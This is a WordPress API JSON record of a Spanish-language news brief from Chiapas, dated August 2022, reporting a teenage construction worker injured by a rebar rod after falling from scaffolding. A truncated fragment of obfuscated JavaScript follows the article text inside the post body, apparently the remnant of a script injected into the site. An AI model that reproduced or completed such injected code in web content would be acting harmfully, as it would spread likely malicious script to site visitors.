{"id":4257,"date":"2022-08-09T22:38:20","date_gmt":"2022-08-09T22:38:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4257"},"modified":"2022-08-09T22:38:21","modified_gmt":"2022-08-09T22:38:21","slug":"obrero-se-clava-una-varilla-en-el-ano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4257","title":{"rendered":"Obrero se clava una varilla en el ano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660084442954-1024x576.jpg\" alt=\"\" class=\"wp-image-4258\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660084442954-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660084442954-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660084442954-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660084442954.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho. Agencia ReporteCiudadano, 9 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un obrero se lesion\u00f3 en sus partes nobles mientras realizaba trabajos de alba\u00f1iler\u00eda en una obra de la capital chiapaneca. Los primeros reportes dan a conocer que, el joven de unos 15 a\u00f1os de edad estaba trabajando sobre un andamio cuando de manera repentina resbal\u00f3 y cay\u00f3 sobre una varilla que sal\u00eda del suelo. El objeto met\u00e1lico se enterr\u00f3 en su \u00e1rea rectal. Sus propios compa\u00f1eros lo llevaron a la Cruz Roja,  donde lo valoraron y auxiliaron. Posteriormente fue llevado al hospital G\u00f3mez Maza, para recibir atenci\u00f3n m\u00e9dica especializada. Su estado de salud, se reporta como reservado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 9 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un obrero se lesion\u00f3 en sus partes nobles mientras realizaba trabajos de alba\u00f1iler\u00eda en una obra de la capital chiapaneca. Los primeros reportes dan a conocer que, el joven de unos 15 a\u00f1os de edad estaba trabajando sobre un andamio cuando de manera &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4258,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4257","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4257","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4257"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4257\/revisions"}],"predecessor-version":[{"id":4259,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4257\/revisions\/4259"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4258"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4257"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4257"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4257"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}